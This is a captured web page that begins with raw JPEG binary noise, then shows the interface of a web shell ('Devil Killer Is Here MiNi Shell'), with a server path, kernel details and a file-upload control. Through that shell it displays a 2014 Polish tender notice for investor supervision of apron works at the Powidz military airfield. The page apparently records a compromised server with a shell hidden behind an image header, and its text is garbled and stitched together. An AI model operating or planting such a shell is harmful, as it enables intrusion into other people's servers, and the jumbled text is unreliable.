JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140704/145555-N-2014.html

<p class="kh_header"><b>Gdańsk: Nadzór inwestorski  w specjalności drogowej - w ramach zadania 54014  Rozbudowa centralnej płaszczyzny postoju samolotów wraz z wykonaniem oznakowania
pionowego  lotniska w Powidzu</b><br>
<b>Numer ogłoszenia: 145555 - 2014; data zamieszczenia: 04.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 17 Terenowy Oddział Lotniskowy , ul. Konopnickiej 13, 80-240 Gdańsk, woj. pomorskie, tel. 58 348 3403, faks 58 3483404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.17 tol-gdansk.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna podległa Ministrowi Obrony Narodowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski  w specjalności drogowej - w ramach zadania 54014  Rozbudowa centralnej płaszczyzny postoju samolotów wraz z wykonaniem oznakowania
pionowego  lotniska w Powidzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa polegająca na sprawowaniu nadzoru inwestorskiego 
w specjalności drogowej na zadaniu 54014 - Rozbudowa centralnej płaszczyzny postoju samolotów wraz z wykonaniem oznakowania pionowego  lotniska w Powidzu.
2. Podstawowy zakres obowiązków i uprawnień Inspektora nadzoru jest określony ustawą z dnia  7 lipca 1994 roku - Prawo budowlane (t. j. Dz. U. 2013 poz. 1409 z późn. zm.).  
Do  obowiązków  Wykonawcy należy w szczególności:
1)	reprezentowanie Zamawiającego na terenie budowy przez sprawowanie kontroli zgodności realizacji robót z przepisami Prawa budowlanego, dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, aktualną wiedzą i sztuką budowlaną, przepisami 
i wymogami technicznymi, przepisami bezpieczeństwa i higieny pracy, przeciwpożarowymi, ochrony środowiska i miejscowymi obowiązującymi na terenie kompleksu wojskowego, decyzją o pozwoleniu na budowę oraz umową z Wykonawcą robót budowlanych (zwanym dalej WRB) i harmonogramem rzeczowo-finansowym;
2)	stawianie się na terenie wykonywania robót budowlanych w terminach i częstotliwościach zapewniających skuteczny nadzór inwestorski w zakresie wynikającym z przepisów Prawa budowlanego oraz zawartej z Zamawiającym umowy, nie rzadziej jednak niż raz w tygodniu 
i  dokumentowanie wizyty swoim wpisem do Dziennika Budowy z zastrzeżeniem zapisów § 7 umowy;
3) informowanie na piśmie Zamawiającego o zagrożeniach w terminowej realizacji robót budowlanych oraz innych istotnych dla przebiegu robót problemach; 
4)opiniowanie pod względem merytorycznym i cenowym wniosków zgłaszanych przez WRB dotyczących, w szczególności zgłoszonych robót dodatkowych, zamiennych i zaniechanych oraz zapewnienie w tym zakresie poprawności opracowania wymaganych dokumentów, w szczególności protokołu konieczności i kosztorysów inwestorskich (zgodnie z procedurami Zamawiającego);
5)niezaciąganie dodatkowych zobowiązań finansowych wobec WRB (realizowanie robót budowlanych do wysokości przyznanego limitu finansowego i wartości zawartej w umowie między WRB - 17 TOL);
6)rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót budowlanych, a w razie potrzeby zaciąganie opinii autora projektu, z wyjątkiem spraw mających wpływ na zmianę kosztów wykonania robót budowlanych;
7)	przygotowywanie projektów wystąpień i odpowiedzi na pisma kierowane przez WRB (na żądanie Zamawiającego); 
8)	uczestniczenie  w naradach zwoływanych przez Zamawiającego oraz organizowanie raz w tygodniu i prowadzenie narad techniczno - koordynacyjnych z udziałem pozostałych inspektorów nadzoru, kierownika budowy, kierowników robót, przedstawicieli WRB, w razie potrzeb Użytkownika, Administratora i innych, mających na celu usprawnienie procesu realizacji inwestycji, sporządzanie protokołów z narad oraz egzekwowanie ustaleń; 
9)	1 raz w miesiącu (oprócz świąt i dni ustawowo wolnych od pracy) być do dyspozycji Zamawiającego w jego siedzibie w godzinach 9.00 - 14.00;
10)	sprawdzanie jakości wykonywanych robót drogowych, wbudowanych materiałów i wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu materiałów i wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie;
11)	uczestnictwo w klasyfikacji oraz przekazywanie Użytkownikowi materiałów pochodzących 
z rozbiórek w tym w szczególności elementów żelbetowych i stalowych oraz dokonanie rozliczenia materiałów z rozbiórek;
12)	odbieranie faktycznie zrealizowanych robót budowlanych oraz robót ulegających zakryciu lub zanikających, uczestniczenie w próbach, procesie rozruchu technicznego, odbiorach technicznych i częściowych, przygotowanie dokumentów i udział w czynnościach odbioru końcowego robót i przekazaniu obiektu budowlanego do użytkowania i eksploatacji;
13)	udział w przeglądach gwarancyjnych i odbiorze pogwarancyjnym (ostatecznym) robót, oraz nadzorowanie jakości i prawidłowości usunięcia przez WRB wad stwierdzonych i zgłoszonych przez Zamawiającego w okresie gwarancji oraz sporządzanie stosownych protokołów;
14)	wydawanie kierownikowi budowy lub kierownikowi robót poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych, materiałów oraz urządzeń technicznych;
15)	żądanie od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową lub pozwoleniem na budowę 
z zastrzeżeniem postanowień ust. 3 pkt 4;
16)	przekazywanie Szefowi Wydziału Budownictwa Zamawiającego tygodniowych telefonicznych sprawozdań z realizacji nadzorowanych robót oraz notatki z narady techniczno - koordynacyjnej;
17)	składanie Zamawiającemu  pisemnych miesięcznych sprawozdań rzeczowo - finansowych z realizacji nadzorowanych robót budowlanych;
18)	nadzór i kontrola nad prawidłowym prowadzeniem dziennika budowy, dziennika laboratoryjnego i innych dokumentów budowy wraz z dokonywaniem stosownych wpisów; 
19)	sprawdzenie i potwierdzenie kompletności opracowanej przez WRB dokumentacji budowy 
i dokumentacji powykonawczej,
20)	sprawowanie funkcji koordynatora pracy inspektorów nadzoru inwestorskiego pozostałych branży;
21)	zachowanie w tajemnicy wszelkich informacji dotyczących zadania oraz wszelkich informacji uzyskanych w związku z wykonywaniem zadania, niezależnie od formy przekazu informacji;
22)	sporządzenie końcowego rozliczenia robót - w zakresie umożliwiającym zaewidencjonowanie przez Gestorów przedmiotu umowy w formie druków PT (w oparciu o dokumenty przechowywane w 17 TOL) - w ciągu 30 dni od daty przekazania obiektu Użytkownikowi uwzględniając pozostałe koszty inwestycji wskazane przez Zamawiającego;
23)	skompletowanie elaboratu - zgodnie z wymaganiami Zamawiającego, zawierającego w szczególności:
a.wykaz dokumentów
b.historię budowy
c.zawiadomienie właściwego organu o rozpoczęciu robót
d.protokół przekazania placu budowy wraz z załącznikami
e.protokoły odbiorów technicznych
f.protokoły odbiorów końcowych i częściowych
g.	wykaz dokumentacji przekazanej Użytkownikowi
h.	protokoły konieczności
i.	oświadczenia wymagane prawem budowlanym
j.	określenie zakresu rzeczowego odebranych robót
k.	protokoły wbudowania urządzeń i materiałów Zamawiającego
l.	protokoły materiałów z odzysku, rozbiórki, demontażu wraz z protokołami ich przekazania Użytkownikowi
m.	dokumentację rozruchową obiektów, urządzeń i instalacji 
n.	zawiadomienia o zakończeniu robót oraz decyzję  o pozwoleniu na użytkowanie obiektu,
o.	korespondencję dot. realizacji zadania
p.	dokumentację powykonawczą, w tym: deklaracje zgodności, certyfikaty na znak bezpieczeństwa, protokoły badań i sprawdzeń, instrukcje obsługi urządzeń, inwentaryzację geodezyjną powykonawczą, dziennik budowy (w przypadku odesłania do Urzędu Nadzoru Budowlanego należy dołączyć pismo przewodnie).
3. Inspektorowi  nadzoru zabrania się,  bez uprzedniej zgody Zamawiającego:
1)  zwalniać WRB z wykonania jakichkolwiek zobowiązań wynikających z umowy na roboty budowlane;
2)  wprowadzać ani wyrażać zgody na realizację robót zamiennych, dodatkowych itp;
3) wprowadzać zmian w technologii robót w szczególności zmian materiałów w stosunku do dokumentacji projektowej i STW i ORB oraz SIWZ bez akceptacji Zamawiającego;
4) wprowadzać terminy wykraczające poza terminy przewidziane dla WRB do realizacji obowiązków wynikających z zawartej umowy, w szczególności terminy usunięcia wad 
w zakresie postanowień wynikających z umowy na roboty budowlane.
4. Znajomość umowy zawartej przez WRB z 17 TOL, znajomość dokumentacji projektowej oraz STW i ORB zadania 54014. 
5. Wykonawca zobowiązany jest do opracowania i przedstawienia Zamawiającemu w terminie 
3 tygodni od podpisania umowy Harmonogramu finansowania inspektora nadzoru robót drogowych proporcjonalnie do wartości odbieranych robót budowlanych.

6. Zakres robót obejmujący nadzór w szczególności: 
6.1 ROBOTY ROZBIÓRKOWE 
Rozbiórki nawierzchni, urządzeń i sieci uzbrojenia kolidujących z projektowaną zabudową.
6.2 DROGA DOJAZDOWA ( SERWISOWA) DLA SPRZĘTU OBSŁUGI Z PUNKTAMI FOD I PARKINGIEM)
Projektowana droga znajdować się będzie w terenie niezagospodarowanym, szerokość nawierzchni drogi 8,0 m z trzema płaszczyznami postoju pojazdów obsługi oraz parkingiem dla samochodów osobowych. 
Konstrukcja drogi:
-warstwa ścieralna z betonu asfaltowego - 5 cm;
-warstwa wiążąca z betonu asfaltowego - 5 cm;
-podbudowa zasadnicza, warstwa górna z kruszywa łamanego - 8 cm,
-podbudowa zasadnicza, warstwa dolna z tłucznia - 18 cm;
-wzmocnienie podłoża stabilizacją cementem - 20 cm.
Konstrukcja płaszczyzn postojowych:
-warstwa ścieralna z kostki betonowo brukowej - 8 cm;
-podsypka cementowo-piaskowa -4 cm;
-podbudowa zasadnicza, warstwa górna z kruszywa łamanego- 8 cm,
-podbudowa zasadnicza, warstwa dolna z tłucznia - 16 cm;
-wzmocnienie podłoża stabilizacją cementem -20 cm.
Konstrukcja parkingu:
-warstwa ścieralna z kostki betonowej brukowej- 8 cm;
-podsypka cementowo-piaskowa -4 cm;
-podbudowa zasadnicza, warstwa górna z kruszywa łamanego- 8 cm,
-podbudowa zasadnicza, warstwa dolna z tłucznia - 16 cm;
-należy również wykonać chodniki z kostki gr. 8 cm, na podsypce i nasypie z gruntu oraz stanowiska FOD z kratami otrząsającymi.
Podstawowe parametry geometryczne:
-długość drogi z odcinkami łączącymi - 954 m;
-szerokość - 8 m;
-szerokość dodatkowych pasów dla FOD - 3,5 m;
-3 płaszczyzny postoju - 20x30m, 20x36m, 20x50 m;
-parking dla samochodów osobowych -26x35 m.

6.3 DROGA SERWISOWA DO URZADZEŃ KANALIZACJI DESZCZOWEJ:
Konstrukcja drogi dwuwarstwowa z kamienia łamanego stabilizowanego mechanicznie.
Podstawowe parametry geometryczne:
-długość - 226 m;
-szerokość - 3,5 m.

6.34 CENTRALNA PŁASZCZYZNA POSTOJU SAMOLOTÓW (CPPS/APRON 2)
Rozbudowa istniejącej płaszczyzny postoju samolotów polega na jej wydłużeniu i poszerzeniu oraz dostosowaniu parametrów wytrzymałościowych do nowych wymogów eksploatacyjnych.
Konstrukcja nawierzchni:
-wzmocnienie istniejącej nawierzchni płaszczyzny poprzez pogrubienie warstwą z betonu cementowego o gr. 22 cm, płyty na szczelinach swobodnych na warstwie poślizgowej i wyrównawczej z betonu asfaltowego;
-nowa nawierzchnia na części dobudowanej z betonu cementowego gr. 25 cm, płyty 
o szczelinach swobodnych na warstwie poślizgowej gr. 2 cm i dwuwarstwowej podbudowie z betonu cementowego o łącznej grubości 42 cm ułożonej na 15 cm warstwie odsączającej 
z pospółki. odwodnienie sączkami, podłoże szczelne uszczelnione geokompozytem separacyjno-drenażowym.
Pobocza z betonu asfaltowego na podbudowie.
Podstawowe parametry nawierzchni:
-nośność wyliczona - PCN-63/R/B/W/U;
-całkowita długość płaszczyzny - 602,39 m;
-szerokość płaszczyzny - 183,85 m;
-szerokość wjazdów dróg kołowania - 22,5 m
-szerokość nawierzchni umocnionych poboczy - 2x8,5 m;
-powierzchnia części jezdnych betonowych -127 409,0 m2
-powierzchnia umocnionych poboczy asfaltobetonowych 15 115,0 m2,
-powierzchnia ukształtowania poboczy gruntowych - około 1,98 ha.
Szczegółowy zakres robót objętych przedmiotowym nadzorem inwestorskim określa dostępna do wglądu w siedzibie Zamawiającego dokumentacja projektowa jawna oraz niejawna o klauzuli Zastrzeżone, oraz Specyfikacja Istotnych Warunków Zamówienia ( SIWZ) opracowana dla zadania 54014 wraz z odpowiedziami udzielonymi przez Zamawiającego na pytania zadane w postępowaniu przez Wykonawców.

UWAGA:
Część dokumentacji opatrzona jest klauzulą ZASTRZEŻONE i znajduje się w siedzibie Zamawiającego. Udostępnienie w/w dokumentacji może nastąpić po uprzednim uzgodnieniu terminu z Zamawiającym. Wgląd w materiały mogą mieć upoważnione  osoby posiadające poświadczenie bezpieczeństwa o klauzuli  ZASTRZEŻONE lub wyższej bądź posiadający dokumenty określone w art. 21 ust.4 Ustawy o ochronie informacji niejawnych ( Dz. U. 2010 Nr 182, poz. 1228).
W sytuacji, gdy ofertę złoży osoba fizyczna Zamawiający dopuszcza przeprowadzenie szkolenia 
w zakresie ochrony informacji niejawnych przez pełnomocnika Szefa 17 TOL  ds. ochrony informacji  niejawnych oraz wydania upoważnienia na czas realizacji zadania.
Do przeprowadzenia w/w procedury wymagana będzie informacja z KRK dotycząca osoby.

Osobą do kontaktu ze strony Zamawiającego będzie:
- p. Mirosław Juźwiak - tel. (58) 348-34-10, kom. 723-682-316 w godzinach 8:00 - 14:30.

UWAGI OGÓLNE DOTYCZĄCE REALIZACJI ZADANIA:
1.	Inspektor nadzoru wystąpi z wnioskiem do Użytkownika obiektu - JW 3293 Powidz, o wydanie przepustki okresowej, na podstawie której realizowany będzie wstęp na teren kompleksu. Wzór wniosku w Rozdziale 28 SIWZ.
2.	W czasie wykonywania  usługi zabrania się wnoszenia i używania na terenie kompleksu wszelkich urządzeń służących do rejestracji dźwięku i obrazu. Korzystanie na terenie zamkniętym z telefonów komórkowych lub innych urządzeń łączności bezprzewodowej do celów wyłącznie służbowych należy uzgodnić z przedstawicielem pionu ochrony informacji niejawnych Użytkownika obiektu - JW 3293 Powidz.
3.	Zabrania się wjazdu na teren kompleksu samochodami w celach bezpośrednio niezwiązanych 
z realizacją zamówienia. Obszar poruszania się pojazdów po terenie budowy zostanie wyznaczony i opisany w protokole przekazania terenu budowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Na podstawie art. 22 ustawy Prawo zamówień publicznych (Pzp), w postępowaniu o udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy i doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4)	sytuacji ekonomicznej i finansowej		
2.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie należy złożyć w oryginale, jednocześnie z zobowiązania winno jasno wynikać w jakim zakresie zostaną oddane do dyspozycji niezbędne zasoby.
3.	Ponadto, w postępowaniu o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	Złożą wymagane dokumenty określone w specyfikacji istotnych warunków zamówienia 
(na podstawie Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r.  w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy - Dz. U.  2013 poz. 231).
2)	Spełniają wymogi wynikające z treści niniejszej specyfikacji istotnych warunków zamówienia oraz projektu umowy.
3)	Spełniają warunki określone w ustawie z dnia 5 sierpnia 2010 r. o ochronie informacji nie-jawnych (tekst jednolity Dz. U. z 2010 r. Nr 182, poz. 1228) łącznie z przepisami wykonawczymi do klauzuli ZASTRZEŻONE lub wyższej.
4)	Dysponują  osobą tj. inspektorem nadzoru, posiadającą uprawnienia do pełnienia samo-dzielnych funkcji technicznych w budownictwie do kierowania robotami  bez ograniczeń w specjalności drogowej w zakresie dróg i nawierzchni lotniskowych,  posiadającą  minimum 3 - letnie doświadczenie  w pełnieniu funkcji inspektora nadzoru inwestorskiego. Osoba ta winna wykazać co najmniej 1 usługę w nadzorowaniu  roboty polegającej na wykonaniu  metodą  ślizgową nawierzchni z betonu cementowego o powierzchni minimum 30 tys. m2 - załączyć odpowiednie dokumenty potwierdzające spełnienie warunku.	 
Wymieniona osoba winna być członkiem Okręgowej Izby Inżynierów Budownictwa i po-siadać aktualne, na czas składania i otwarcia ofert ubezpieczenie od odpowiedzialności cywilnej ( Wykonawca zobowiązany będzie do aktualizowania  i przekładania  Zamawiającemu w/w ubezpieczenia  z zachowaniem zasady ciągłości, do czasu zakończenia odbioru ostatecznego  robót wraz z okresem gwarancji i rękojmi)  oraz posiadać poświadczenie bezpieczeństwa o klauzuli ZASTRZEŻONE lub wyższej, lub upoważnienia i zaświadczenia wydanego na podstawie art. 21 ust. 3 ustawy o ochronie informacji niejawnych z dnia 5 sierpnia 2010 r. (tekst jednolity Dz. U. z 2010 r. Nr 182 poz. 1228).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda w składanej ofercie:
1. Wskazania  osoby,  która będzie  uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat jej  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nią  czynności oraz in-formacją o podstawie do dysponowania tą osobą. 
Osoba wskazana jako inspektor nadzoru  posiadająca uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami  bez ograniczeń w specjalności drogowej w zakresie dróg i nawierzchni lotniskowych, powinna posiadać minimum 3 - letnie  doświadczenie  w pełnieniu funkcji inspektora nadzoru inwestorskiego, w tym w nadzorowaniu  co najmniej 1 usługę w nadzorowaniu roboty polegającej na wykonaniu metodą ślizgową nawierzchni z betonu cementowego o powierzchni minimum 30 tys. m2 - załączyć odpowiednie dokumenty potwierdzające spełnienie warunku. 	 
2.Oświadczenia, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
a)Inspektor nadzoru posiadający uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami  bez ograniczeń w specjalności drogowej w zakresie dróg i nawierzchni lotniskowych.Osoba wymieniona w pkt. 2 lit. a jest członkiem Okręgowej Izby Inżynierów Budownictwa i posiada aktualne, na czas składania i otwarcia ofert ubezpieczenie od odpowiedzialności cywilnej ( Wykonawca zobowiązany będzie do aktualizowania  i przekładania  Zamawiającemu w/w ubezpieczenia  z zachowaniem zasady ciągłości, do czasu zakończenia odbioru ostatecznego  robót wraz z okresem gwarancji i rękojmi)  oraz posiada poświadczenia bezpieczeństwa o klauzuli ZASTRZEŻONE lub wyższej, lub upoważnienia i zaświadczenia wydane na pod-stawie art. 21 ust. 3 ustawy o ochronie informacji niejawnych z dnia 5 sierpnia 2010 r. (tekst jednolity Dz. U. z 2010 r. Nr 182 poz. 1228).
W przypadku gdy inspektor nadzoru jest pracownikiem firmy sprawującej nadzór wymagane jest poświadczenie bezpieczeństwa do klauzuli minimum  ZASTRZEŻONE lub spełnienie zapisów art. 21 Ustawy z dnia 5 sierpnia 2010 roku o ochronie informacji niejawnych ( Dz. U. z 2010 r. nr 182 poz.1228),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

